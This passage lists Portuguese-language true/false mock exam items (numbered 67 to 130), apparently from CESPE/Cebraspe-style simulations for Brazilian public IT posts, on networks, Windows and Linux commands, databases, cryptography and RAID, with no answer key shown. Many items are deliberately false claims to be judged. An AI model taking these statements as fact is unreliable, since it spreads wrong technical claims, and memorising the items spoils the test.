riscos de segurança da informação, ao passo que o monitoramento da gestão de riscos pode resultar em modificação de ferramentas utilizadas, a depender, por exemplo, de como abordar a continuidade de negócios e sua resiliência diante dos incidentes. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Desenvolvimento de Sistemas. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade Tecnologia e Informação - 6º Simulado / Questão: 114 A respeito de criptografia, julgue os itens subsequentes. 67. [Q1383940] Chave pública é uma chave de criptografia e(ou) descriptografia conhecida por todos os elementos que usam a criptografia c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Segurança da Informação. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade Tecnologia e Informação - 6º Simulado / Questão: 111 68. [Q1383941] Não compete à infraestrutura de chaves públicas brasileira (ICP-Brasil) o papel de credenciar e descredenciar participantes da cadeia de certificação, mas apenas indicá-los. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Segurança da Informação. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade Tecnologia e Informação - 6º Simulado / Questão: 112 69. [Q1383931] Em uma rede com todos os computadores ligados a um hub, temos uma topologia lógica estrela e uma topologia física de barramento. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Redes de computadores. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade Tecnologia e Informação - 6º Simulado / Questão: 102 70. [Q1383933] Em uma rede em anel, a máquina que possui o token é que poderá transmitir o sinal. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Redes de computadores. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade Tecnologia e Informação - 6º Simulado / Questão: 104 71. [Q1383897] Em um software com desenvolvimento no modelo incremental, cada módulo passará por todas as fases “cascata” de projeto, e será entregue ao cliente um software operacional. Assim, o cliente receberá parte do produto final em menos tempo. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Desenvolvimento de Sistemas. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade Tecnologia e Informação - 6º Simulado / Questão: 68 72. [Q1383902] Ainda sobre o DISM, essa ferramenta de linha de comando pode ser utilizada para adicionar ou remover recursos do Windows. Para consultar os recursos disponíveis para instalação com o DISM, utiliza-se o comando “Dism /online / Get-Roles”, e para instalar o recurso utilizamos o comando “Dism /online /Enable-Role /FeatureName:< Nome_do_Recurso >/All”. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade Tecnologia e Informação - 6º Simulado / Questão: 73 73. [Q1383904] No Windows 10, foi retirada a capacidade de reiniciar em Safe Mode usando a combinação de teclas Shift+F8, tradicional para o Windows XP e Windows 7, com o objetivo de o processo de inicialização ser mais rápido. Para que seja possível obrigar o Windows 10 a responder a Shift+F8, é preciso habilitar esse recurso com o comando “BCDEdit /set {default} bootmenupolicy legacy” em um prompt de comando elevado, com privilégios administrativos. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Windows. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade Tecnologia e Informação - 6º Simulado / Questão: 75 74. [Q1383905] No Windows 10, pode-se configurar um endereço IPv4 por meio da ferramenta de linha de comando Netsh.exe ou mediante cmdlets do PowerShell. Para adicionar o endereço IPv4 192.168.17.1/24 com gateway 192.168.0.1, deve ser utilizado, para o comando Netsh, a seguinte sintaxe: Netsh -InterfaceAlias Ethernet -Source static -IPAddress 192.168.17.1 -PrefixLength 24 - DefaultGateway 192.168.0.1 c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Windows. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade Tecnologia e Informação - 6º Simulado / Questão: 76 75. [Q1383915] No Linux, o arquivo /etc/fstab é utilizado para configurar todos os dispositivos e seus pontos de montagem do sistema. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade Tecnologia e Informação - 6º Simulado / Questão: 86 76. [Q1383916] No Linux, podemos utilizar o comando swapoff para desabilitar arquivos para paginação e troca em determinados dispositivos. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade Tecnologia e Informação - 6º Simulado / Questão: 87 77. [Q1383922]Em um sistema operacional Linux, os principais arquivos de logs ficam armazenados no diretório /etc/log. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade Tecnologia e Informação - 6º Simulado / Questão: 93 78. [Q1383923] Em um sistema operacional Linux, o comando usermod é utilizado para modificar uma conta de usuário. Com ele, é possível alterar o diretório home de um usuário utilizando o parâmetro -d. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade Tecnologia e Informação - 6º Simulado / Questão: 94 79. [Q1383925] Em um sistema operacional Linux, para executar um script / opt/scripts/auditoria.sh apenas uma vez por semana, é preciso cadastrar uma tarefa agendada no /etc/crontab, adicionando uma nova linha, com os seguintes parâmetros: * * * * 7 root /opt/scripts/auditoria.sh c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade Tecnologia e Informação - 6º Simulado / Questão: 96 80. [Q1383926] Para definir o nome da máquina (hostname) em um sistema operacional Linux, utilizamos o comando host < novo_da_maquina >. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade Tecnologia e Informação - 6º Simulado / Questão: 97 81. [Q1349314] As topologias em estrela, anel e malha têm como uma de suas características a utilização de conexões ponto a ponto. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Redes de computadores. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 5º Simulado / Questão: 101 82. [Q1349321] Considerando os vários tipos e tecnologias de meios de transmissão, um escrivão de polícia foi designado para implementar uma rede local utilizando tecnologia sem fio. A correta escolha foi utilizar o padrão IEEE 802.11. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Redes de computadores. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 5º Simulado / Questão: 108 83. [Q1349333] Uma organização deverá definir qual política de controle de acesso irá implementar, pois as políticas são mutuamente exclusivas, não podendo coexistir em uma mesma organização. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Segurança da Informação. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 5º Simulado / Questão: 120 A respeito do sistema operacional Windows, julgue o item a seguir. 84. [Q1349305] O Windows Server 2016 é uma versão do sistema operacional lançada pela Microsoft como sendo pronto para utilização em ambientes de computação em nuvem. Dentre as opções de instalação, podemos destacar a Server Core, que trata de uma instalação menor, a qual inclui os componentes principais do Windows Server, oferece suporte a todas as funções de servidor e inclui uma GUI local. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Windows. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 5º Simulado / Questão: 95 A respeito da estrutura de diretórios do sistema operacional Linux, julgue o item a seguir. 85. [Q1349300] No diretório /root, estão os arquivos essenciais do sistema, como aplicativos, utilitários para administração do sistema. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 5º Simulado / Questão: 90 86. [Q1349296] Em um sistema Linux, um usuário configurou o modo de proteção para um arquivo indicado pela combinação rwxr-xr-x, significando que somente usuários que não são proprietários podem escrever, ler e executar o arquivo. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 5º Simulado / Questão: 86 A respeito do firewall do Windows, julgue o item a seguir. 87. [Q1349294] É utilizado o comando netsh para exibir ou modificar a configuração de rede de um computador em execução no momento. O comando netsh advfirewall set allprofiles state off é utilizado para desabilitar todos os perfis existentes no firewal do Windows. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Windows. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 5º Simulado / Questão: 84 A respeito do sistema operacional Windows, julgue o item a seguir. 88. [Q1349293] É utilizado o comando chkdsk para exibir o status de algum volume ou partição de um disco rígido, presente no computador, sem corrigir qualquer erro. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Windows. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 5º Simulado / Questão: 83 Acerca do sistema operacional Windows, julgue o seguinte item. 89. [Q1349288] Em um sistema operacional Windows, utiliza-se comando net start e net stop para iniciar ou parar serviços do sistema diretamente do prompt de comando. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Windows. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 5º Simulado / Questão: 79 Acerca das licenças de software, software livre e código aberto, julgue o seguinte item. 90. [Q1349280] As licenças GPL, em inglês GNU General Public License, ou em português Licença Pública Geral GNU, são utilizadas por projetos de software livre e de código aberto. O Kernel Linux é um exemplo dos que utilizam a licença GPL. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 5º Simulado / Questão: 74 Sobre arquitetura cliente- servidor multicamadas, julgue os itens. 91. [Q1349260] O conceito de sistema distribuído pode ser definido como um sistema que possui componentes localizados em computadores interligados em rede e que se comunicam e coordenam suas ações por meio da troca de mensagens entre estes componentes. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Cliente/Servidor. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 5º Simulado / Questão: 61 92. [Q1349263] O modelo de comunicação utilizado em uma arquitetura cliente-servidor segue a estratégia de requisição resposta,em que, em geral, o servidor inicia a requisição e o cliente envia uma resposta. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Cliente/Servidor. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 5º Simulado / Questão: 64 93. [Q1349250] A Unidade Central (UC) do processado é responsável por operações lógicas utilizando, por exemplo, os operadores AND, NOT, OR e XOR. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Unidade Central de Processamento. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 5º Simulado / Questão: 52 94. [Q1349257] O Barramento de um computador tem a finalidade de conectar os vários componentes internos, como o processador, a memória e os dispositivos de entrada e saída. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Arquitetura de Computadores. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 5º Simulado / Questão: 59 A respeito da definição de banco de dados e linguagem SQL, julgue os itens a seguir. 95. [Q1345663] O conjunto de comandos que lidam com os objetos, criando bancos de dados, esquemas, tabelas, atributos etc., está presente na DML. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linguagem SQL. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área: Controle Externo - 5º Simulado / Questão: 128 A respeito dos conceitos de Mineração de Dados e CRISP-DM, julgue o item a seguir. 96. [Q1345662] Durante a fase de compreensão do negócio é preciso organizar e documentar todos os dados que se encontram disponíveis, além de explorar e verificar a qualidade desses dados. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Data Mining. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área: Controle Externo - 5º Simulado / Questão: 127 A respeito da álgebra relacional e do banco de dados, julgue o item a seguir. 97. [Q1345655] Na álgebra relacional existem os operadores tradicionais e os operadores relacionais, onde cada um apresenta a sua função e uma representação na forma como as consultas serão construídas. A operação de produto cartesiano é uma operação que resultará em uma nova relação que contenha todas as tuplas que pertençam à primeira relação e não pertença à segunda. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Banco de Dados. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área: Controle Externo - 5º Simulado / Questão: 122 A respeito do conceito de generalização e especialização em banco de dados, julgue o item a seguir. 98. [Q1343870] A especialização, em banco de dados, é um processo no qual suprimimos as diferenças entre os diversos tipos de entidade e destacamos as características comuns e generalizamos em uma única superclasse. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Banco de Dados. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área: Controle Externo - 5º Simulado / Questão: 36 99. [Q1343865] Para garantir a integridade dos dados em um sistema de banco de dados, as transações precisam garantir a verificação de várias propriedades. Uma delas é a propriedade de consistência, utilizada para garantir que uma transação será executada totalmente ou não será executada. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Segurança da Informação. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área: Controle Externo - 5º Simulado / Questão: 31 100. [Q1343867] Uma cardinalidade entre um conjunto de entidades A e B de uma associação N- N, uma entidade A é associada, no máximo, a 1 entidade B, e uma entidade B é associada, no mínimo a 1 entidade A. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Algoritmos. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área: Controle Externo - 5º Simulado / Questão: 33 101. [Q1319271] Dentre os conceitos de banco de dados relacional, devemos lembrar das restrições de integridade. As restrições de integridade possuem o objetivo de garantir a exatidão e a consistência dos dados em um banco de dados relacional. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Segurança da Informação. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área: Controle Externo - 4º Simulado / Questão: 122 102. [Q1319275] A respeito das técnicas de modelagem dimensional de dados, devemos pontuar o Esquema Estrela (star schema), em que as tabelas se encontraram dispostas da seguinte forma: a tabela de fatos mais ao centro relacionando-se com as diversas outras tabelas de dimensão, que estão dispostas em torno da tabela de fatos. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Banco de Dados. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área: Controle Externo - 4º Simulado / Questão: 126 103. [Q1319280] A detecção de anomalias consiste em utilizar técnicas para identificar padrões que fogem do comportamento esperado, sendo que estes podem ser eventos ou observações que geram a suspeita de problemas. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Segurança da Informação. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área: Controle Externo - 4º Simulado / Questão: 131 104. [Q1291758] Quando nos referimos à modelagem de dados, o modelo conceitual representa o mais alto nível da estrutura de um banco de dados. Na etapa de criação do modelo conceitual, entram em cena os detalhes técnicos do projeto de um banco de dados, como os dados serão armazenados e quais políticas de segurança serão implementadas. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Desenvolvimento de Sistemas. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas da União TCU - BR / Auditor Federal de Controle Externo - 2º Simulado / Questão: 93 105. [Q1291759] Dados estruturados são aqueles organizados e representados com uma estrutura flexível e dinâmica, não possuindo uma estrutura mais rígida. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Estrutura de Dados. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas da União TCU - BR / Auditor Federal de Controle Externo - 2º Simulado / Questão: 94 106. [Q1291764] Assim como em bancos transacionais, a modelagem de bancos de dados multidimensionais baseia-se na utilização de um modelo relacional, com entidades, atributos e relacionamentos. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Banco de Dados. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas da União TCU - BR / Auditor Federal de Controle Externo - 2º Simulado / Questão: 99 107. [Q1282651] Um exemplo de tipo de ataque a uma aplicação Web é XSS (Cross-Site Scripting) baseado na inclusão de código malicioso no servidor, em que as requisições realizadas pelos usuários sãorespondidas utilizando-se fontes de dados não confiáveis. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Desenvolvimento de Sistemas. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 4º Simulado / Questão: 114 108. [Q1282657] Um esquema de encriptação é considerado computacionalmente seguro se: I – O custo para quebrar a cifra ultrapassa o valor da informação encriptada; ou II – O tempo exigido para quebrar a cifra supera o tempo de vida útil da informação. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Criptografia, Assinatura e Certificado Digitais. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 4º Simulado / Questão: 120 109. [Q1282641] O modelo de arquitetura em nuvem que provê serviços de infraestrutura como CPU, memória e armazenamento é conhecida como IaaS. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Processador. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 4º Simulado / Questão: 104 110. [Q1282642] Em sistemas de armazenamento, normalmente, a controladora de disco suporta RAID (Redundant Array of Independent Disks, ou seja, conjunto redundante de discos independentes). No caso de os dados serem armazenados nos discos por meio da técnica de mirroring, o RAID será do tipo RAID c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > RAID. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 4º Simulado / Questão: 105 111. [Q1282643] A técnica de mirroring ou espelhamento é quando os dados serão armazenados de forma dividida nos discos. Quando se utiliza esse tipo de RAID, os discos serão vistos como se fossem um único no sistema. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > RAID. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 4º Simulado / Questão: 106 112. [Q1282609] Em um sistema Windows, é possível abrir o Editor de Registro através do comando regedit a ser digitado no Executar. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Windows. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 4º Simulado / Questão: 72 113. [Q1282612] Em um sistema Windows, é possível realizar o mapeamento de um compartilhamento de rede através do prompt de comando. Para mapear o compartilhamento \192.168.0.1\ pasta_compartilhada a unidade G:, é utilizado o seguinte comando net use G: \192.168.0.1\pasta_compartilhada / PERSISTENTE:YES. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Redes de computadores. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 4º Simulado / Questão: 75 114. [Q1282616] Os sistemas operacionais Windows, em qualquer versão, não possuem o conceito do usuário administrador, uma vez que todos os usuários criados já possuem privilégios irrestritos ao sistema. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Windows. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 4º Simulado / Questão: 79 115. [Q1282617] Em um sistema Windows, podemos usar o utilitário rsync com o objetivo de realizar a sincronização de arquivos entre computadores, não sendo suportado pelo Windows. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Windows. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 4º Simulado / Questão: 80 116. [Q1282619] No prompt de comando do Windows, é possível encerrar uma ou mais tarefas ou processos através do comando kill. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Windows. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 4º Simulado / Questão: 82 117. [Q1282628] Em um sistema Linux, para listar os diretórios, subdiretórios e arquivos presentes em um diretório /home/usuário, é preciso executar o comando ls -la /home/usuario. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 4º Simulado / Questão: 91 118. [Q1282634] Em um sistema Linux, os dispositivos são representados através de arquivos, como discos rígidos que são representados por um arquivo sda ou sdb, esses arquivos ficam armazenados no diretório /proc. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 4º Simulado / Questão: 97 119. [Q1282605] Um dos princípios do desenvolvimento ágil é ter em mente que os requisitos do sistema não devem mudar. Dessa forma, haverá mais estabilidade na solução de software desenvolvida. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Desenvolvimento de Sistemas. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 4º Simulado / Questão: 68 120. [Q1282590] O Hexadecimal ABC convertido para base binária resulta em 101010111100. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Arquitetura de Computadores. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 4º Simulado / Questão: 53 121. [Q1282592] Em relação aos sistemas, uma limitação no sistema de arquivos NTFS é de não suportar nomes de arquivos e pastas com mais de 1.024 caracteres. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Sistema de Arquivos. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 4º Simulado / Questão: 55 122. [Q1278536] Considerar que uma autenticação baseada em biometria é totalmente segura, ou seja, impossível de ser burlada, é incorreto. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Vulnerabilidade. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 113 123. [Q1278526] O IPv6 é um protocolo da camada de rede, de 128 bits, com 8 grupos com 4 dígitos em notação decimal, separados por dois pontos. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Configuração de redes. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 103 124. [Q1278531] Conhecido por ser utilizado em redes de computadores para prover a sincronização da hora nosequipamentos, o NTP possui uma versão simplificada chamada de SNTP. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Outros. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 108 125. [Q1278498] Em um sistema Windows, com o objetivo de reiniciar algum serviço, devemos utilizar os comandos NET STOP e NET START. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Windows. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 75 126. [Q1278499] Em um sistema Windows, com o objetivo de realizar a criação de um usuário por meio do prompt de comando, utilizamos o comando adduser nome-do-usuario, entre outros parâmetros de configuração. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Windows. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 76 127. [Q1278501] Em um sistema Windows com a função Hyper-V habilitada, é desejável habilitar uma VLAN em um dos switches virtuais existentes. Para isso, devemos realizar essa configuração no Hyper-V Virtual Network Adapter. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Ferramentas de Virtualização (Hypervisores, VMWare, Hyper-V etc.). Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 78 128. [Q1278508] Em um computador ou em uma estação de trabalho, é possível instalar apenas um sistema operacional Windows ou um sistema operacional Linux, não sendo possível a existência da instalação de ambos. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 85 129. [Q1278513] Uma vez que o Linux é distribuído e protegido pela GPL (GNU General Public License), sua estrutura é completamente livre de falhas e problemas de segurança, reduzindo diversos custos para sua manutenção e suporte, além da necessidade de atualizações frequentes. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 90 130. [Q1278515] Em um sistema Linux, podemos utilizar o comando top para constatar quais os processos estão consumindo mais memória e processamento. c) Certo e) Errado Disciplinas/Assuntos vinculados: 